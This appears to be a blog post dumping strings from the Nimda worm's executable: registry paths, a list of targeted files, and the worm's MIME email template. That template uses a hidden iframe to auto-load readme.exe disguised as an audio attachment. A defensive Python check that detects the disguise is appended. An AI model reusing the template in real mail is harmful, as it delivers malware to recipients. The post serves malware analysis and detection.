Nimda !!

317 This is what was embedded in the executable file
System\CurrentControlSet\Services\VxD\MSTCP NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

(middle omitted)

c: readme main index default html .asp .htm
\readme.eml .exe mep winzip32.exe
riched20.dll .nws .eml .doc .exe
(omitted)
\readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe
\riched20.dll boot Shell explorer.exe load.exe -dontrunold
\system.ini \load.exe \\ octet

I guess it tampers in various ways with the files that use the file names and extensions in the latter part.
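
A defender-side check for the message template in the dump above, added here as an example and not part of the original post: it flags a MIME part whose name ends in an executable extension while its declared Content-Type says otherwise (here audio/x-wav for readme.exe), and records whether an HTML part loads it through a cid: reference. The function name, the extension list and the placeholder attachment body are assumptions.

```python
import email
import re
from email import policy

# Assumed extension list for this example; extend it for local policy.
EXECUTABLE_EXT = (".exe", ".com", ".scr", ".pif", ".bat")
CID_SRC = re.compile(r"""src\s*=\s*["']?cid:([^\s"'>]+)""", re.I)

# Constructed sample: headers follow the template above, the body is a placeholder.
SAMPLE = """\
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative";
 boundary="====_ABC1234567890DEF_===="

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0></iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

cGxhY2Vob2xkZXI=
--====_ABC1234567890DEF_====--
"""

def find_disguised_parts(raw):
    """Flag parts with an executable name under a non-executable declared type."""
    msg = email.message_from_string(raw, policy=policy.default)
    referenced = set()  # Content-IDs that an HTML part loads via src=cid:
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            referenced.update(CID_SRC.findall(part.get_content()))
    findings = []
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        ctype = part.get_content_type()
        if name.endswith(EXECUTABLE_EXT) and not ctype.startswith("application/"):
            cid = str(part["Content-ID"] or "").strip().strip("<>")
            findings.append({"name": name, "declared_type": ctype,
                             "auto_loaded": cid in referenced})
    return findings
```

On the constructed sample the function reports readme.exe declared as audio/x-wav with auto_loaded set, because the zero-size iframe in the HTML part references its Content-ID.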